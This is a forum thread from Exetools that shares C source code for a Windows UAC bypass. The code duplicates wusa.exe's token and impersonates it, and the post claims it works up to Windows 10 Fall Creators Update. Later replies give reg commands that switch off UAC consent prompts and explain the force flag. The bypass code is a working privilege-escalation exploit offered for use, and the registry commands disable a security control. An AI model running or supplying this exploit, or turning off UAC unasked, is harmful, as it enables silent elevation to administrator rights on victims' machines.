Exetools

Exetools (https://forum.exetools.com/index.php)
-   Source Code (https://forum.exetools.com/forumdisplay.php?f=46)
-   -   Uac bypass implementation (https://forum.exetools.com/showthread.php?t=18713)

0xall0c 03-17-2018 21:13

Uac bypass implementation
 
This is an implementation of uac bypass method (Author: CIA & James Forshaw).
Works from windows 7 to latest windows 10 fall creators update.

Code:

int StepOverUAC()
{
        SECURITY_ATTRIBUTES sa;
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.bInheritHandle = TRUE;
        sa.lpSecurityDescriptor = NULL;

        if (!CreatePipe(&inRead, &inWrite, &sa, 0))
                return 0;
        if (!CreatePipe(&outRead, &outWrite, &sa, 0))
                return 0;
        NtSetInformationToken nt = (NtSetInformationToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationToken");
        RtlLengthSid rts = (RtlLengthSid)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlLengthSid");
        NtFilterToken filter = (NtFilterToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtFilterToken");
        DWORD Error, bytesIO;
        NTSTATUS Status;
        HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
        HANDLE filterToken = NULL;
        BOOL bCond = FALSE;
        SHELLEXECUTEINFO shinfo, sh;
        SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
        TOKEN_MANDATORY_LABEL tml, *ptml;
        PSID pIntegritySid = NULL;
        STARTUPINFO si, si2;
        PROCESS_INFORMATION pi, pi2;
        WCHAR szBuffer[MAX_PATH];

        RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
        shinfo.cbSize = sizeof(shinfo);
        shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
        shinfo.lpFile = L"wusa.exe";
        shinfo.nShow = SW_HIDE;
        if (!ShellExecuteEx(&shinfo))
                return 0;
        if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
                return 0;
        TerminateProcess(shinfo.hProcess, -1);
        WaitForSingleObject(shinfo.hProcess, -1);
        if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
                return 0;
        if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
                return 0;
        tml.Label.Attributes = SE_GROUP_INTEGRITY;
        tml.Label.Sid = pIntegritySid;
        Status = nt(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml));
        if (!NT_SUCCESS(Status))
                return 0;
        filter(hNewToken, 0x4, NULL, NULL, NULL, &filterToken);
        if (!ImpersonateLoggedOnUser(filterToken))
                return 0;
}

After this just use ShellExecute with "runas" verb.

TechLord 03-18-2018 01:29

See this post for the latest developments in UAC Bypass updated just 3 days ago in our sister forum :

Windows 10 Redstone 1/2 UAC changes

0xall0c 03-18-2018 02:43

had no info about the upcoming release, still use till can ;)

sendersu 03-18-2018 02:59

even very hot & latest w10?

0xall0c 03-19-2018 15:27

there is nothing hot about it :P

niculaita 03-19-2018 15:46

how to restore UAC in 1st or 2nd position with an exe or with regfile ?
sometime I telework on windows in other languages and is difficult to find UAC and restore back to normal. Thanks!

0xall0c 03-19-2018 17:17

to turn off uac completely:

Code:

reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0
to back to normal

Code:

reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5
hope this helps.

niculaita 03-20-2018 06:20

in cmd
C:\Users\Nicolae>reg ADD / HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0
ERROR: Invalid key name.
Type "REG ADD /?" for usage.


maybe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /f

and
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 5 /f

what is /f for ?

0xall0c 03-20-2018 15:45

/f makes sure to overwrite if the specified key value already exists, without prompting the user.


All times are GMT +8. The time now is 08:31.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Always Your Best Friend: Aaron, JMI, ahmadmansoor, ZeNiX